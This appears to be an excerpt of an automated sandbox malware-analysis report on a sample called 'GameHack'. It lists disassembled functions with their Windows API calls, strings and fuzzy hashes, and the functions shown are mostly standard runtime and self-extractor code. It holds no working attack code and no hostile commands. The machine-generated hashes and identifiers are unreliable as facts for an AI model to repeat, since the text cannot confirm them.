                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
                                      • API String ID: 3937224194-1658105358
                                      • Opcode ID: 8faf10d844b9f0be276a1e15d7bf0ee3b93d38a4b285af54b83fe413ce57798c
                                      • Instruction ID: 888a38e2533e4a869ad34f17afe88ffecc6cb4873dcaabd848117131ee316a42
                                      • Opcode Fuzzy Hash: 8faf10d844b9f0be276a1e15d7bf0ee3b93d38a4b285af54b83fe413ce57798c
                                      • Instruction Fuzzy Hash: CA31E131004248EFCB51AF65DD48B6B7BE9FF48315F00455AFE49AA163DB34D808DB61
                                      Function 00EFBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EFBF79: _free.LIBCMT ref: 00EFBFA2
                                      • _free.LIBCMT ref: 00EFC003
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFC00E
                                      • _free.LIBCMT ref: 00EFC019
                                      • _free.LIBCMT ref: 00EFC06D
                                      • _free.LIBCMT ref: 00EFC078
                                      • _free.LIBCMT ref: 00EFC083
                                      • _free.LIBCMT ref: 00EFC08E
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction ID: 367f49ba24f52d0e2268599422793a2a584eecf178c08508e1a34381deb0d060
                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction Fuzzy Hash: B511FC72640B0DFAD620BBB0CD06FEBB7DD6F04700F909855B3A976552DB65F9048A90
                                      Function 00EF20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00EF20C1,00EEFB12), ref: 00EF20D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EF20E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EF20FF
                                      • SetLastError.KERNEL32(00000000,?,00EF20C1,00EEFB12), ref: 00EF2151
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 90d77356b9beb221f7d663df3c02557ade64077fad1dd49696731017888b0f98
                                      • Instruction ID: 04ee53a4bc24a8b52e077a8e5d2ed13fb5c0d6a5665b3bf9765c600a49aec2e5
                                      • Opcode Fuzzy Hash: 90d77356b9beb221f7d663df3c02557ade64077fad1dd49696731017888b0f98
                                      • Instruction Fuzzy Hash: 6401D43221B31D6EE6642BB5BC8557A3A88FB517787211B2DF324791E0EF124C05A148
                                      Function 00EEDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      • Opcode ID: 3b1cdc7ce90b6e4d044bc3700c46e82fd69eec610e8f69967273efba1ccda3af
                                      • Instruction ID: 20ac416eaf6ac948bd82b4304ee9045e76e4dd049f88608a18789c07a1b6b13f
                                      • Opcode Fuzzy Hash: 3b1cdc7ce90b6e4d044bc3700c46e82fd69eec610e8f69967273efba1ccda3af
                                      • Instruction Fuzzy Hash: 52017D3134526E5B8F205F765C902E7B398AA417EE330363BE541F3240DE91C841F6B0
                                      Function 00EE0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0D0D
                                        • Part of subcall function 00EDACF5: GetVersionExW.KERNEL32(?), ref: 00EDAD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00EE0CB8), ref: 00EE0D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EE0D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00EE0D56
                                      • SystemTimeToFileTime.KERNEL32(?,00EE0CB8), ref: 00EE0D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0D72
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 19104e034ba9e7c8b345fdc01760884c832c65af7ceac9114e00f5a0dc2649cb
                                      • Instruction ID: 8e558e0a009233a2aeb6f9db9e55350f0dde1d40f38496f5cda1a9b0db0c64e1
                                      • Opcode Fuzzy Hash: 19104e034ba9e7c8b345fdc01760884c832c65af7ceac9114e00f5a0dc2649cb
                                      • Instruction Fuzzy Hash: 7831D47A90024EEBCB00DFE5C8859EFBBBCFF58700B04455AE955E3610E730AA85CB64
                                      Function 00EE91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 94039ccb5b02abce938aa8ad25ac3c6ca461d3186084b087582fa1c76c7bb4b5
                                      • Instruction ID: a06d33cd1c9293d79a0478176fdc5be84e528286dc402a12e6147662767952fe
                                      • Opcode Fuzzy Hash: 94039ccb5b02abce938aa8ad25ac3c6ca461d3186084b087582fa1c76c7bb4b5
                                      • Instruction Fuzzy Hash: A521957160024EBBDB049E12DC81FBB77EDAB54788B14A524FD09BB252E270DD41A691
                                      Function 00EF8FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00F10EE8,00EF3E14,00F10EE8,?,?,00EF3713,00000050,?,00F10EE8,00000200), ref: 00EF8FA9
                                      • _free.LIBCMT ref: 00EF8FDC
                                      • _free.LIBCMT ref: 00EF9004
                                      • SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF9011
                                      • SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF901D
                                      • _abort.LIBCMT ref: 00EF9023
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 98812c61a904bbf7fdea22313770d2be07c683fe4ebc6b7ad6593cf03e64cae1
                                      • Instruction ID: 20b4b3941a971a455adefde896a0cade4bf7aa5b107876dcd5c06ee52b688882
                                      • Opcode Fuzzy Hash: 98812c61a904bbf7fdea22313770d2be07c683fe4ebc6b7ad6593cf03e64cae1
                                      • Instruction Fuzzy Hash: A6F02837605A0D6FC31133246E0AB3B399AAFC1778F392114F715F2293EE20CD026415
                                      Function 00EED2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EED2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EED30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EED31D
                                      • TranslateMessage.USER32(?), ref: 00EED327
                                      • DispatchMessageW.USER32(?), ref: 00EED331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00EED33C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: bd2db92db64b6eedafbac965dc26fee878571e9b10f61a2ed8dfda7ad045178a
                                      • Instruction ID: 5042318e7f6028109f669988dbf5d78c3460dcec82ef9250e1b0ff1fe71608b1
                                      • Opcode Fuzzy Hash: bd2db92db64b6eedafbac965dc26fee878571e9b10f61a2ed8dfda7ad045178a
                                      • Instruction Fuzzy Hash: C9F03CB2A0111DABCB205BA2DC4CEDBBF6EEF517A1F008012FA06E2010D6348545D7B1
                                      Function 00EEC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00EEC435
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: de8ed47d5b9f4e86eda45a2b2fa3ce42dfd8e4bf2e1b5b8eeb77e947c674864e
                                      • Instruction ID: 3b1acb80f0cf290b13d84b0e99d9af76255067e309a089a14a9c9ad445ad6abb
                                      • Opcode Fuzzy Hash: de8ed47d5b9f4e86eda45a2b2fa3ce42dfd8e4bf2e1b5b8eeb77e947c674864e
                                      • Instruction Fuzzy Hash: 3431817290068DAADF25DA96CC41EEB77FCEB14704F1050A6FA19F6090EBB09FC5CA50
                                      Function 00EEADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00EEADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EEAE22
                                      • DeleteObject.GDI32(00000000), ref: 00EEAE54
                                      • DeleteObject.GDI32(00000000), ref: 00EEAE77
                                        • Part of subcall function 00EE9E1C: FindResourceW.KERNEL32(00EEAE4D,PNG,?,?,?,00EEAE4D,00000066), ref: 00EE9E2E
                                        • Part of subcall function 00EE9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E46
                                        • Part of subcall function 00EE9E1C: LoadResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E59
                                        • Part of subcall function 00EE9E1C: LockResource.KERNEL32(00000000,?,?,?,00EEAE4D,00000066), ref: 00EE9E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 977a3932e496cdd9022bccb454bdf14f655f6221fb155e9c2faf57ee09a6bbad
                                      • Instruction ID: 651285a3ec0af885115404138b58d15ab667eaf9e58a033a8402685755b44da8
                                      • Opcode Fuzzy Hash: 977a3932e496cdd9022bccb454bdf14f655f6221fb155e9c2faf57ee09a6bbad
                                      • Instruction Fuzzy Hash: E801F9325406ADA7C71077669C06ABF7BFAAF81B51F0C1129FD00B72A2DF718C1596B2
                                      Function 00EECC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EECCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00EECCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00EECD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00EECD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 74fc364e9b74fc4a82e785bd9a07cc9da5e6ff53084c8b51125369bcdf2a8628
                                      • Instruction ID: 59505ec176ebaf8aeb60122965b05e00b2a353e8516e8b68b4d582d12fb0fae5
                                      • Opcode Fuzzy Hash: 74fc364e9b74fc4a82e785bd9a07cc9da5e6ff53084c8b51125369bcdf2a8628
                                      • Instruction Fuzzy Hash: A001453238425C7AD1204F65AD08FAB7BADEB4A706F300010F34AB60E0C7629806E721
                                      Function 00EF2503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00EF251A
                                        • Part of subcall function 00EF2B52: ___AdjustPointer.LIBCMT ref: 00EF2B9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00EF2531
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00EF2543
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00EF2567
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID: /)
                                      • API String ID: 2633735394-750405031
                                      • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction ID: 2ca444cf4bf9040f47daaccc15bd8ab33402c26b92a6b778a64a5459ee0de437
                                      • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                      • Instruction Fuzzy Hash: 1A01023200010DABCF129FA5CC11EEA3BAAEF58714F159018FA1876120C336E961ABA1
                                      Function 00EF75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EF7573,00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002), ref: 00EF75E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EF75F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00EF7573,00000000,?,00EF7513,00000000,00F0BAD8,0000000C,00EF766A,00000000,00000002), ref: 00EF7618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: a00b34ed01852d9ff12e46ef99631f3b48ad6d524069c361590a37c5e3113ec0
                                      • Instruction ID: d381afdd9f7c8bae2120eb945bb774e350c0c20bba0679f9b06efe138b147ac6
                                      • Opcode Fuzzy Hash: a00b34ed01852d9ff12e46ef99631f3b48ad6d524069c361590a37c5e3113ec0
                                      • Instruction Fuzzy Hash: B3F0AF30A0861CBBDB159B94DC09BAEBFB8EF04716F004068F805E2190DB708E40EA90
                                      Function 00EDEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EE0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EE00A0
                                        • Part of subcall function 00EE0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00EDEB86,Crypt32.dll,00000000,00EDEC0A,?,?,00EDEBEC,?,?,?), ref: 00EE00C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EDEB92
                                      • GetProcAddress.KERNEL32(00F181C0,CryptUnprotectMemory), ref: 00EDEBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: f4376507435191e0c6542645a3260fd8755772fe903ecf9df63852750b3460f8
                                      • Instruction ID: 43e3fc1762f31833c60799f882f7904fc17523682e774de8469daab91559574f
                                      • Opcode Fuzzy Hash: f4376507435191e0c6542645a3260fd8755772fe903ecf9df63852750b3460f8
                                      • Instruction Fuzzy Hash: 5FE04670801745AEDB30AF39980CB42BEE9AB14708F00981EE4D6F3280DAF4E580AB61
                                      Function 00EF7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
